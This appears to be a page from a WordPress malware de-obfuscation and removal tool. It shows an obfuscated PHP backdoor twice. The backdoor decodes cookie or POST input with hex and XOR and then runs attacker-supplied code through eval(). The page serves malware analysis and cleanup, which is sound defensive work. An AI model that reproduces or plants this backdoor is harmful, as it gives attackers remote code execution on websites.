De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php function XFJeRGxVE() { $mSMUb = array("qhFguTrvUDLeYYalvINQOsTlhKI" => "tFutPVGbS"); $EtXmTWcr = array( /* KLU */ "YwNcYGRMP" => "yDvNwjaPUOMaRRqSvtDTTJPCqZtIl", ); $FJXluMnz = array( $mSMUb, /*X*/ $_COOKIE, $mSMUb, $_POST, $EtXmTWcr, ); return $FJXluMnz; } /* jDAl */ /* eaK */ function zTzMeKho() { /* y*/ $MgwdxhxJP = "#"; foreach (XFJeRGxVE() as $rSLxx) { /*CYZ */ JNUOvHulpB($rSLxx, $MgwdxhxJP); } } /* n*/ function pcPxwCl($MXqqSrydnJ, $mSMUb) { if (count($MXqqSrydnJ) == 3) { /* CV */ $EhkekvIFY = $MXqqSrydnJ[1]; $zPAeHhF = $MXqqSrydnJ[2]; $_Y = '32594'; $abuOVnHuP = $EhkekvIFY($zPAeHhF); $_jk = '1592'; /* o*/ eval($abuOVnHuP); die; } /* WfmW */ } /*m */ /* cuG */ function fWwrFxNS($suZrMbV, $rAzzJRZm) { return $suZrMbV ^ $rAzzJRZm; } /* ad*/ /* pGr */ function LPKdrL($vWZXzeXjGN, $MgwdxhxJP) { /* ioHq*/ /*F */ $vWZXzeXjGN = explode($MgwdxhxJP, $vWZXzeXjGN); pcPxwCl($vWZXzeXjGN, $MgwdxhxJP); $_pV = '17799'; } function JNUOvHulpB($rSLxx, $MgwdxhxJP) { /* TCPwP */ foreach ($rSLxx as $rAzzJRZm => $suZrMbV) { /* lv */ uZFNVq($rAzzJRZm, yfPHNUygM($suZrMbV), $MgwdxhxJP); $_yrm = '51682'; /* Cfi */ } /*y */ } function SGfJjEqALa($rAzzJRZm, $suZrMbV) { $JHaAl = strlen( /* Hn */ $suZrMbV ) / strlen( /* xae*/ $rAzzJRZm ); $_QzJ = '13180'; $rAzzJRZm .= "Htr-uVlItIy-gEmwy-NMpOeF-ZDVNJU-EbGMVuh-HxGKOo"; $rAzzJRZm = str_repeat($rAzzJRZm, $JHaAl + 1); return $rAzzJRZm; } /* DaxAV*/ function yfPHNUygM($suZrMbV) { return @pack( /* wTvy */ 'H*', /*UlLW */ $suZrMbV ); } function uZFNVq($rAzzJRZm, $suZrMbV, $MgwdxhxJP) { /* QEOHo */ /* m */ LPKdrL($suZrMbV ^ SGfJjEqALa( $rAzzJRZm, /*xdNwC */ $suZrMbV ), $MgwdxhxJP); } /* PGz */ /* D*/ zTzMeKho();
<?php function XFJeRGxVE() { $mSMUb = array("qhFguTrvUDLeYYalvINQOsTlhKI" => "tFutPVGbS"); $EtXmTWcr = array( /* KLU */ "YwNcYGRMP" => "yDvNwjaPUOMaRRqSvtDTTJPCqZtIl", ); $FJXluMnz = array( $mSMUb, /*X*/ $_COOKIE, $mSMUb, $_POST, $EtXmTWcr, ); return $FJXluMnz; } /* jDAl */ /* eaK */ function zTzMeKho() { /* y*/ $MgwdxhxJP = "#"; foreach (XFJeRGxVE() as $rSLxx) { /*CYZ */ JNUOvHulpB($rSLxx, $MgwdxhxJP); } } /* n*/ function pcPxwCl($MXqqSrydnJ, $mSMUb) { if (count($MXqqSrydnJ) == 3) { /* CV */ $EhkekvIFY = $MXqqSrydnJ[1]; $zPAeHhF = $MXqqSrydnJ[2]; $_Y = '32594'; $abuOVnHuP = $EhkekvIFY($zPAeHhF); $_jk = '1592'; /* o*/ eval($abuOVnHuP); die; } /* WfmW */ } /*m */ /* cuG */ function fWwrFxNS($suZrMbV, $rAzzJRZm) { return $suZrMbV ^ $rAzzJRZm; } /* ad*/ /* pGr */ function LPKdrL($vWZXzeXjGN, $MgwdxhxJP) { /* ioHq*/ /*F */ $vWZXzeXjGN = explode($MgwdxhxJP, $vWZXzeXjGN); pcPxwCl($vWZXzeXjGN, $MgwdxhxJP); $_pV = '17799'; } function JNUOvHulpB($rSLxx, $MgwdxhxJP) { /* TCPwP */ foreach ($rSLxx as $rAzzJRZm => $suZrMbV) { /* lv */ uZFNVq($rAzzJRZm, yfPHNUygM($suZrMbV), $MgwdxhxJP); $_yrm = '51682'; /* Cfi */ } /*y */ } function SGfJjEqALa($rAzzJRZm, $suZrMbV) { $JHaAl = strlen( /* Hn */ $suZrMbV ) / strlen( /* xae*/ $rAzzJRZm ); $_QzJ = '13180'; $rAzzJRZm .= "Htr-uVlItIy-gEmwy-NMpOeF-ZDVNJU-EbGMVuh-HxGKOo"; $rAzzJRZm = str_repeat($rAzzJRZm, $JHaAl + 1); return $rAzzJRZm; } /* DaxAV*/ function yfPHNUygM($suZrMbV) { return @pack( /* wTvy */ 'H*', /*UlLW */ $suZrMbV ); } function uZFNVq($rAzzJRZm, $suZrMbV, $MgwdxhxJP) { /* QEOHo */ /* m */ LPKdrL($suZrMbV ^ SGfJjEqALa( $rAzzJRZm, /*xdNwC */ $suZrMbV ), $MgwdxhxJP); } /* PGz */ /* D*/ zTzMeKho();
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.